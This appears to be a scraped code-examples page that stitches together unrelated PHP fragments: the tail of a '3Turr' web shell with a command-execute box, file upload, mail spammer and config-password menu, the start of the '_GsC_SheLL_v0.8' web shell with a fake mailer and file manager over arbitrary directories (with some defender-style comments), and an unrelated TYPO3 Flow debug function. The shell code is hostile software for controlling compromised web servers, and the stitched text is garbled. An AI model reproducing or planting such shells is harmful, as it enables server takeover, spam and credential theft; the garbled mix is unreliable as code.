  <li><a href="#" onclick="g(\'zip\',null,\'\',\'\',\'\')">ZIP</a></li>
  <li><a href="#" onclick="g(\'mail\',null,\'\',\'\',\'\')">Mail Spammer</a></li>
</ul>
</li>
<li><a href="#" >3Turr-VIP</a>
<ul>
 <li><a href="#" onclick="g(\'conpass\',null,\'\',\'\',\'\')">C0nf1G-P4$$\'s</a></li>
</ul>
</li>
<li><a href="#" onclick="g(\'yemen\',null,\'\',\'\',\'\')">ABOUT</a></li>
</ul>
 
 </div>
';
    ?>
<footer id="det" style="z-index:9999;background:#000;position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0);padding:3px; text-align:center; border-top: 1px solid #ff0000; border-bottom: 2px solid #990000;color:red;">
<font align=center>3Turr ~ SH311</font>
</footer>
<form style="z-index:9999;position:fixed;left:1;bottom:4px;display:inline" onsubmit="Encoder('encod');g('proc',null,this.c.value);return false;">
<input  style="width:290px" type=text id=encod name=c value="" placeholder="Execute" <?php 
    !isset($_POST['a']) || $_POST['a'] != 'proc' || !isset($_POST['p1']) || $_POST['p1'] == '' ? print "autofocus" : 0;
    ?>
 >
<input type=submit style="color:red;width:30px;" value=">>">
</form>
<!--###################-->
<form  style="z-index:9999;position:fixed;right:10px;bottom:3px;display:inline;" method='post'  ENCTYPE='multipart/form-data'> 
<input type=hidden name=a value='FilesMAn'> 
<input type=hidden name=c value='<?php 
    echo htmlspecialchars($GLOBALS['cwd']);
    ?>
'> 
<input type=hidden name=p1 value='uploadFile'> 
<input type=hidden name=charset value='<?php 
    echo isset($_POST['charset']) ? $_POST['charset'] : '';
    ?>
'> 
<input style="border:1px solid #5BEEFF;height:19px;value:[   select    ];"  class="toolsInp" type=file name=f >  <input style="color:red;width:30px;" type=submit value=">>" ></form>
<?php 
}
Ejemplo n.º 29
// Page header of a PHP web shell sample. Everything below runs at top level on
// every request; no access check is visible in this excerpt.
// For defenders: the fixed literals in this header (the <title> text, the banner
// markup and the ?mode= links) are stable strings to match when scanning a webroot.
echo "<title>_GsC_SheLL_v0.8_By _GsC_</title>";
// CSS styles (inline stylesheet, no external resources)
echo "<style>\ninput  {\n                background: #b00;\n                color: #fff;\n            }\n\n            input:hover  {\n                background: #000;\n            }\n\n            select  {\n                background: #b00;\n                color: #fff;\n            }\n            \n            select:hover  {\n                background: #000;\n            }\n\n            hr  {     color: red;\n                      background-color: red;\n                      height: 3px;  \n                      width:100%;\n                      border:0;   }\n\n            .footer table { border:1px dashed black\n                    }\n\n            .footer tr { border:1px groove black\n                    }\n\n            .footer td { border:1px groove black\n                    }\n\n            textarea  {\n                background: #b00;\n                color: #fff;\n            }\n\n            textarea:hover  {\n                background: #000;\n            }\n\n            body  {\n                font-family: courier,courier-new,arial;\n                background-color:black;\n                color:white;\n            }\n\n            A:link { text-decoration: none;\n                     color:white\n            }\n\n            A:hover {  \n                     color:red\n            }\n\n            a:visited { text-decoration: none;\n            color: #FFFFFF;\n            }\n\n            A:visited:hover {  \n                     color:red\n            }\n\n            table {border:1px dashed red}\n\n            td {border:1px groove #666666}\n\n            #dropper:hover  {\n                color: #fff;\n            }\n        </style> ";
// Banner (links back to the script itself with an empty query string)
echo "<center><b><a href=\"?\"><font color=\"green\" size=\"8\">_GsC_</font><font color=\"white\" size=\"8\">SheLL_</font><font color=\"red\" size=\"8\">V0.8_</font></a></b></center><br> <br>";
echo "<hr>";
// Applications: feature links selected through the "mode" query parameter
echo "<center><b>[<a href=?mode=fakemail>Fake mailer</a>] [<a href=?mode=PHPinfo>PHP info</a>]</center><hr>";
// Info: host details disclosed to whoever requests the page (server address,
// server software, PHP version, client address). The $_SERVER values are written
// into the HTML without escaping.
echo "<center><table border=\"0\"><tr><td><b><font color=red>Ip server:</font></b> " . $_SERVER['SERVER_ADDR'] . "</td><td><b><font color=red>Server Software:</font></b> " . $_SERVER['SERVER_SOFTWARE'] . "</td><td><b><font color=red>Versione PHP:</font></b> " . phpversion() . " </tr><tr>\n<td><b><font color=red>Your ip:</font></b> " . $_SERVER['REMOTE_ADDR'] . "</td><td><b><font color=red>Safe mode:</font></b>";
// safe_mode was removed in PHP 5.4; on later versions ini_get() returns false
// and this always prints "Off".
if (@ini_get("safe_mode") == "1" || @ini_get("safe_mode") == "on") {
    echo "On";
} else {
    echo "Off";
}
// get_current_user(), getmyuid() and getmygid() report the owner of the script
// file, not the effective user of the PHP process, so the "id" shown here can
// differ from the account the web server actually runs as.
echo "</td><td><b><font color=red>id:</font></b> " . get_current_user() . " | uid= " . getmyuid() . " | gid= " . getmygid() . "</td></tr></table></center><br><hr>";
// General variables
// $_GET['dir'] is read without isset(), so a request without it raises a notice.
// htmlspecialchars() only HTML-encodes the value; nothing here restricts which
// directory it names.
$dir = htmlspecialchars($_GET['dir']);
// Home shell
if (!isset($mode)) {
    $_GET['dir'] == '' ? $dir = @getcwd() : ($dir = htmlspecialchars($_GET['dir']));
    @chdir($dir);
    if (isset($dir)) {
        echo "<form method=get>&nbsp;&nbsp;Dir : <input type=text name=dir value={$dir} size=65%>&nbsp;<input type=submit value=Invia></form>";
    }
    echo "<table width=\"100%\" border=1><tr><td><b>File name</b></td><td><b>Tipo</b></td><td><b>Size (KB)</b></td><td><b>Chmod</b></td><td><b>Azioni</b></td></tr>";
    foreach (glob("*") as $file) {
        $chmod = substr(sprintf('%o', fileperms($file)), -3);
        if (is_dir($file)) {
            if (isset($dir)) {
                echo "\n                    \n                    \n                    <tr>\n                            <td>\n                                <a href=?dir=" . @getcwd() . "/" . $file . ">\n                                    <font color=\"red\">{$file}</font>\n                                </a>\n                            </td>\n                            <td>\n                            Folder\n                            <td>\n                            " . filesize($file) . "\n                            </td>\n                            <td>\n                            {$chmod}\n                            </td>\n                            <td>\n                            [<a href=?mode=rename&file={$dir}/{$file}>R</a>] [<a href=?mode=delete&file={$dir}/{$file}>D</a>] [<a href=?mode=copy&file={$dir}/{$file}>C</a>] [<a href=?mode=chmod&file={$dir}/{$file}&chmod={$chmod}>P</a>] [<a href=?mode=download&file={$dir}/{$file}>D</a>]\n                            </td>\n                        </tr>\n                        ";
 /**
  * Render information about the current HTTP request, its response and the PHP process, if possible.
  *
  * Yields an empty string unless the static object manager is available and the
  * active request handler is an HTTP request handler.
  *
  * NOTE(review): request and response are embedded through their string form, which
  * presumably carries headers (cookies, authorization values) — confirm this output
  * only reaches trusted logs or a debug-only view.
  * getmyuid(), getmygid() and get_current_user() describe the owner of the running
  * script file, not the effective user of the PHP process.
  *
  * @return string
  */
 protected function renderRequestInfo()
 {
     // Guard: without an object manager there is no way to reach the bootstrap.
     if (!(Bootstrap::$staticObjectManager instanceof ObjectManagerInterface)) {
         return '';
     }

     /** @var Bootstrap $bootstrap */
     $bootstrap = Bootstrap::$staticObjectManager->get(\TYPO3\Flow\Core\Bootstrap::class);
     $activeHandler = $bootstrap->getActiveRequestHandler();

     // Guard: only HTTP request handlers expose a request/response pair.
     if (!($activeHandler instanceof HttpRequestHandlerInterface)) {
         return '';
     }

     $httpRequest = $activeHandler->getHttpRequest();
     $httpResponse = $activeHandler->getHttpResponse();

     $requestText = $httpRequest == '' ? '[request was empty]' : $httpRequest;
     $report = PHP_EOL . 'HTTP REQUEST:' . PHP_EOL . $requestText . PHP_EOL;

     $responseText = $httpResponse == '' ? '[response was empty]' : $httpResponse;
     $report .= PHP_EOL . 'HTTP RESPONSE:' . PHP_EOL . $responseText . PHP_EOL;

     // One "Label: value" line per process attribute, in the original order.
     $processLines = [
         'Inode: ' . getmyinode(),
         'PID: ' . getmypid(),
         'UID: ' . getmyuid(),
         'GID: ' . getmygid(),
         'User: ' . get_current_user(),
     ];
     $report .= PHP_EOL . 'PHP PROCESS:' . PHP_EOL . implode(PHP_EOL, $processLines) . PHP_EOL;

     return $report;
 }